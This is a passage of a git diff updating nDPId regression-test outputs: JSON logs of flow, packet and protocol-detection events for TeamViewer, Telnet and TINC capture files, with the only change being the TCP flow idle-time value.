@@ -11,7 +11,7 @@ 00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":520136,"flow_last_seen":520160,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":420,"midstream":0,"thread_ts_msec":520160,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1283,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1283,"packets-processed":1282,"total-skipped-flows":0,"total-l4-data-len":643545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":633881} 
00940{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1009,"flow_first_seen":520136,"flow_last_seen":558067,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":520494,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1298,"packets-processed":1298,"total-skipped-flows":0,"total-l4-data-len":645952,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":729854} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1298/1298 diff --git a/test/results/telnet.pcap.out b/test/results/telnet.pcap.out index 99c8f805e..aa9a18d87 100644 --- a/test/results/telnet.pcap.out +++ b/test/results/telnet.pcap.out 
@@ -1,24 +1,24 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"telnet.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":943755158387} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":943755158387,"flow_last_seen":943755158387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":943755158387,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":943755158387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158387,"pkt":"AADAn6CXAKDMO7\/6CABFEAA8RjxAAEAGcxzAqAACwKgAAQYOABeZxaDsAAAAAKACfXjgowAAAgQFtAQCCAoAnCckAAAAAAEDAwA="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":943755158389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158389,"pkt":"AKDMO7\/6AADAn6CXCABFAAA8UeMAAEAGp4XAqAABwKgAAgAXBg4X8WM9mcWg7aASQ+D7twAAAgQFqAEDAwABAQgKACWmLACcJyQ="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":943755158389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":943755158389,"pkt":"AADAn6CXAKDMO7\/6CABFEAA0Rj1AAEAGcyPAqAACwKgAAQYOABeZxaDtF\/FjPoAQfXjt1wAAAQEICgCcJyQAJaYs"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":943755158387,"flow_last_seen":943755158387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":943755158387,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":943755158387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158387,"pkt":"AADAn6CXAKDMO7\/6CABFEAA8RjxAAEAGcxzAqAACwKgAAQYOABeZxaDsAAAAAKACfXjgowAAAgQFtAQCCAoAnCckAAAAAAEDAwA="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":943755158389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158389,"pkt":"AKDMO7\/6AADAn6CXCABFAAA8UeMAAEAGp4XAqAABwKgAAgAXBg4X8WM9mcWg7aASQ+D7twAAAgQFqAEDAwABAQgKACWmLACcJyQ="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":943755158389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":943755158389,"pkt":"AADAn6CXAKDMO7\/6CABFEAA0Rj1AAEAGcyPAqAACwKgAAQYOABeZxaDtF\/FjPoAQfXjt1wAAAQEICgCcJyQAJaYs"} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":18,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755158548} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":18,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755158547,"pkt":"AADAn6CXAKDMO7\/6CABFEACJRkRAAEAGcsfAqAACwKgAAQYOABeZxaFUF\/FjhIAYfXjMkwAAAQEICgCcJzQAJaYs"} 
-00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755160950} 
00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755160949,"pkt":"AADAn6CXAKDMO7\/6CABFEAA6RkpAAEAGcxDAqAACwKgAAQYOABeZxaGyF\/FjyYAYfXgMpwAAAQEICgCcKCQAJaYu"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160962,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160962,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 
00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755178297} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755178295,"pkt":"AADAn6CXAKDMO7\/6CABFEABORlNAAEAGcvPAqAACwKgAAQYOABeZxaHEF\/FmAIAYfXjBVQAAAQEICgCcLuoAJaY2"} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":70,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755184206} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755184205,"pkt":"AADAn6CXAKDMO7\/6CABFEAA5RlxAAEAGcv\/AqAACwKgAAQYOABeZxaHeF\/Fns4AYfXjYKQAAAQEICgCcMTkAJaZf"} 00200{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":78,"source":"telnet.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":943755185261} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"telnet.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":943755185260,"pkt":"AADAn6CXAKDMO7\/6CABFEAA4Rl9AAEAGcv3AqAACwKgAAQYOABeZxaHjF\/FoUIAYfXhjlAAAAQEICgCcMaMAJaZf"} 
-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} 
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","packets-captured":92,"packets-processed":87,"total-skipped-flows":0,"total-l4-data-len":1660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":943755197958} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 92/87 diff --git a/test/results/tinc.pcap.out b/test/results/tinc.pcap.out index 69a22d771..ef53b30e9 100644 --- a/test/results/tinc.pcap.out +++ b/test/results/tinc.pcap.out 
@@ -1,15 +1,15 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tinc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1495983427717} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427717,"flow_last_seen":1495983427717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427717,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1495983427717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427717,"pkt":"ABcILL3nACbGCvpSCABFEAA8vEtAAEAGvw6DcqgbuVPacOds2We5l\/9AAAAAAKACchD0JwAAAgQFtAQCCAp3tTETAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427744,"flow_last_seen":1495983427744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427744,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1495983427744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427744,"pkt":"ABcILL3nACbGCvpSCABFEAA8k+lAAEAG53CDcqgbuVPacMCK2WgWL9D7AAAAAKACchDyzQAAAgQFtAQCCAoov3nyAAAAAAEDAwc="} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1495983427768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427768,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9ln52yg0OtBuZf\/QYASOQhw5gAAAgQFtAEBBAIBAwMH"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"} 
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 